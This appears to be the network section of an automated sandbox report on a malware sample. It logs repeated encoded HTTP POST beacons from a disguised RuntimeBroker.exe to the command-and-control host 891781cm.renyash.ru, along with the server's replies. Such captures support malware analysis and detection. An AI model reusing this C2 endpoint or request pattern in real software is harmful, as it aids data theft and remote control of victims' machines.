                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:54.662436962 CET1056OUTData Raw: 55 55 58 55 5f 5a 51 5b 55 5a 54 59 51 5a 55 54 58 52 5c 5c 59 55 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UUXU_ZQ[UZTYQZUTXR\\YURX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]?Y!\#(:%5Z>$4W-B ^0/Q0;,]<><R*#^!'^)#
                                                                                                                          Jan 1, 2025 04:22:54.777077913 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:55.101548910 CET808INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:55 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eWXXUNNPJUcYAJfyN5HKKXS2Ivzq5MppHxeNN3HgK7cYJBjv%2BqB5yMLOXKnKcf%2BxPdcgsK6CCdKZh1FrSBMi%2FwOVRx6%2B8kTly5PGCJCSFCrMR2EuFx2VkhUVTgeMUpnVHrz%2FJA0j"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf633c1877184d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4613&min_rtt=1534&rtt_var=6735&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=55782&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          67192.168.2.449809104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:55.238003969 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:55.584225893 CET1056OUTData Raw: 55 5f 58 55 5a 56 51 5e 55 5a 54 59 51 59 55 5d 58 58 5c 5c 59 5d 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_XUZVQ^UZTYQYU]XX\\Y]RZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#("#1X%!\(./Z$4*9$3"V$<;;,_<?*#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:55.671962023 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:55.933850050 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:55 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5YL1JIbz9brHNTo6q0zmrFUtOpwX1E2WRYulpFZhtfmQMpRaGqURtHk6Ftwxsld0AWfhbmenmZ2z5SunHsVQi7ffyRx39%2BE03SkE00e%2BC1ndTjssB9GUGOhz7%2Fqa23lxckdzsR8a"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6341ad74c33c-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2161&min_rtt=1649&rtt_var=1642&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=254134&cwnd=147&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          68192.168.2.449810104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:56.053711891 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:56.412399054 CET1048OUTData Raw: 50 55 58 5c 5f 5a 51 5b 55 5a 54 59 51 5b 55 5d 58 5b 5c 5f 59 50 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PUX\_ZQ[UZTYQ[U]X[\_YPR]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ X(7*&=&(.?'>,'''$/Z,>(<=+)#^!'^)
                                                                                                                          Jan 1, 2025 04:22:56.532259941 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:56.781194925 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:56 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYoMTatWYxUDKuRhk%2FDPl%2FnR7oT5z%2BwwOelZO91zNX1yPRW5tNjUVbe5R9rWo4%2BPsLHonmfrlW%2BF9UQ%2Ffx6b4Eq4oQV2NCIvj1jz9XEQZoRs8qCi2SM1hXwywX1KTdTEXW67xU3T"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6346fc9343b5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5303&min_rtt=1743&rtt_var=7774&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=48304&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          69192.168.2.449812104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:56.998074055 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:57.349886894 CET1056OUTData Raw: 50 52 58 54 5f 5b 51 58 55 5a 54 59 51 58 55 52 58 5b 5c 5a 59 5d 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PRXT_[QXUZTYQXURX[\ZY]R[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ^<<1 +-%.5\=>03>.43Y!$//$Z<-$W>#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:57.477719069 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:57.733666897 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:57 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvDlseJMpc%2BRk%2Fl%2FO3XWvgOyj14RvC59vPSrWUalGESp0OacTkE3e3tTfefWnszTK1bnCWo7Oo3jRNLKku5CNKMH7QmtR2NLpVbbd8dsrcQyNwsdR8VHzG809UpiN9AAIfZmv8ti"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf634ced72c352-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3114&min_rtt=1563&rtt_var=3689&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=104457&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0
                                                                                                                          Jan 1, 2025 04:22:57.971324921 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:57 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvDlseJMpc%2BRk%2Fl%2FO3XWvgOyj14RvC59vPSrWUalGESp0OacTkE3e3tTfefWnszTK1bnCWo7Oo3jRNLKku5CNKMH7QmtR2NLpVbbd8dsrcQyNwsdR8VHzG809UpiN9AAIfZmv8ti"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf634ced72c352-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3114&min_rtt=1563&rtt_var=3689&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=104457&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          70192.168.2.449818104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:57.971676111 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:58.318742037 CET1056OUTData Raw: 55 55 58 55 5f 5a 51 55 55 5a 54 59 51 5d 55 55 58 52 5c 54 59 56 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UUXU_ZQUUZTYQ]UUXR\TYVRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \+?678!X&-%[)-+$9'''?>U0$/=;(.'*#^!'^)?
                                                                                                                          Jan 1, 2025 04:22:58.415847063 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:58.683269978 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:58 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vl44LBtFRiqCS9zhOKitQChcJA1rJl4vfw2RrWV1N66SE%2FNs3w5Y%2B7QKwNdP10%2BwmJoj10O6LrKmhJ7PWqH1Q7ObKBBtOCLnUI5vdnnCUmMji%2Bq36mlaF1Mrc%2Br4eYpfCahO%2BCrT"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6352dfdd1a1b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4701&min_rtt=1970&rtt_var=6201&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=61290&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          71192.168.2.449824104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:58.803731918 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:59.162355900 CET1056OUTData Raw: 50 54 58 52 5a 56 51 5a 55 5a 54 59 51 59 55 5c 58 5a 5c 54 59 50 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTXRZVQZUZTYQYU\XZ\TYPR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#</\41$-=\)-7[0.-4(]',1$,X/=(=.0*#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:59.274080992 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:59.467876911 CET816INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:59 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wFSD%2FJRYls%2B6qKtZntS3QJqCg%2BKmebL7cIi%2B3WCgLeSMxQfxN5%2FPw%2BB%2BGIy%2F9L5rSmSEJwJ6uddBcpHTvSdfDdGiSTa8cpBYjW2nKVD0Qqy1EdGOC13UtQlEXV7Hsr%2BQLvHMpnln"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63582abcc45c-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4584&min_rtt=1475&rtt_var=6772&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=55403&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          72192.168.2.449830104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:59.756567955 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          73192.168.2.449836104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:59.856102943 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:00.209404945 CET1780OUTData Raw: 55 55 58 56 5a 5a 54 5f 55 5a 54 59 51 59 55 5d 58 5a 5c 5e 59 5c 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UUXVZZT_UZTYQYU]XZ\^Y\R_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?=X (!_26)>3"U94_'U$+87<.4><#^!'^)/
                                                                                                                          Jan 1, 2025 04:23:00.320178986 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:00.580270052 CET960INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:00 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XcSl4G0xRPckd11xqyMDXWXWMMfSe3DopGXTNZSU04Q1zyw8x%2Bun145oAiexJl3TaM%2B%2BDyRH4CsLq1vhoNTAukrBBh7aEJpqqTfNLP3Lr3CFiPr2GVrarqBqg%2B%2B1MUrR2Hy%2BTSCe"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf635ebd755e7c-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3631&min_rtt=2132&rtt_var=3798&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=103348&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 56 27 05 27 5f 2b 3e 2a 11 2c 2f 3f 1d 25 11 04 5c 33 30 30 12 25 2e 25 5d 2e 5e 3f 05 3e 38 23 13 26 39 35 5b 21 31 22 5d 31 0c 2e 5d 04 1d 26 01 29 3a 00 14 28 2f 29 5e 3d 0c 20 14 27 27 06 03 32 1a 20 5b 33 03 39 04 36 0b 23 10 27 23 3b 0a 2a 29 02 00 26 3d 29 09 34 3a 2e 57 0d 12 22 55 32 00 17 1f 3e 0f 3c 54 21 02 2c 0d 24 59 2f 57 27 5a 3f 08 37 38 0b 0c 3d 01 38 10 35 09 36 0d 24 04 3b 5e 22 07 0c 01 36 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"V''_+>*,/?%\300%.%].^?>8#&95[!1"]1.]&):(/)^= ''2 [396#'#;*)&=)4:.W"U2><T!,$Y/W'Z?78=856$;^"6#"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          74192.168.2.449837104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:59.974498987 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:00.318958044 CET1056OUTData Raw: 55 5f 5d 54 5f 5d 51 55 55 5a 54 59 51 5c 55 53 58 53 5c 5f 59 54 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U_]T_]QUUZTYQ\USXS\_YTR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#<?2#X$>2=>''$&U,43Y"U$8>$]<V(,#^!'^)
                                                                                                                          Jan 1, 2025 04:23:00.449989080 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:00.711957932 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:00 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wIFd%2Bt%2Bs2vFAVQNV5CIpjrQzEUMYVGMrNXIHmnM0N5cqD5UXc0C7SKMvKyFiLiGblAOf%2BWRsf5rVrvA8%2BRTFYTXJfsCN5%2BKv8KTHn0pJgnEDshqKq5mhD5B05p26xUfy%2F7O4qVF"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf635f8fcc41d5-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5326&min_rtt=2247&rtt_var=7001&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=54311&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          75192.168.2.449843104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:00.834613085 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:01.193625927 CET1056OUTData Raw: 55 56 5d 56 5a 5f 54 5a 55 5a 54 59 51 53 55 51 58 5e 5c 58 59 56 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
